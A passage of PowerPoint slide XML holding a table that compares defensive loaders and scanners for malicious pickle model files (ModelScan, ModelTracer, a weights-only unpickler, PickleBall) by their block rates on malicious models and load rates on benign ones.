                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Correct Block Rate</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Benign Loaded</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Correct Load Rate</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>75/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>89.3%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>236/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>93.6%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>44/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>52.4%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>252/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>157/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>62.3%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>201/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>79.8%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282315" y="1698196"/>
            <a:ext cx="734799" cy="734799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76194" y="1495500"/>
            <a:ext cx="426900" cy="410100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="61975" lIns="61975" spcFirstLastPara="1" rIns="61975" wrap="square" tIns="61975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="949"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76194" y="1495500"/>
